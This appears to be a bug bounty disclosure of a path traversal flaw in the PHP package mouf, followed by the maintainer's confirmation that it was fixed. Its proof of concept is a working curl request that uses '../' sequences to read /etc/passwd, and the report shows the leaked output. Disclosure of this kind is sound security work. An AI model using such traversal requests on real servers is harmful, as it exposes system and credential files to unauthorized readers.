Path Traversal in thecodingmachine/mouf

Valid

Reported on

May 6th 2021


✍️ Description

Mouf is vulnerable to path traversal attacks on mouf/mouf/src/direct/get_source_file.php because it doesnt sanitize user supplied parameters as shown below.
Vulnerable variable: file
Method: GET
The $file variable is constructed using the user supplied data, and then a file is open with the user supplied arg.

🕵️‍♂️ Proof of Concept

Install mouf using composer
Do a request with curl

curl 'localhost/mouf_test/vendor/mouf/mouf/src/direct/get_source_file.php?selfedit=true&file=../../../../../../../etc/passwd'

Observe the response

Error, invalid file nameroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
...

💥 Impact

By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.

David Négrier
7 months ago

Maintainer


Hey! vulnerability is completely valid. I'm having an issue with Huntr.dev, I cannot mark the vulnerability as valid is the UI, but it definitely is. I opened an issue in Huntr.dev bug tracker, and I merged the PR directly upstream and tagged a new release.

Thanks a lot!

hitisec
7 months ago

Researcher


Thanks!